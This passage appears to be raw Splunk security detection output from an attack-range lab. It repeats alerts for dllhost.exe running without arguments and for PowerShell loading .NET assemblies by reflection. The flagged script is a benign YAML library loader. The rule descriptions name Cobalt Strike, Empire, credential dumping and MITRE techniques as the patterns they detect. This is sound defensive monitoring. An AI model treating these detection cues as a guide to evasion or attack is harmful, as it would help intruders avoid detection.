DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664751600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664751600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe5c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664754933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664754933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664754933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664754933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664748000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664748000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1252", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664748000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664748000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4e4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664751332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664751332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664751332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw 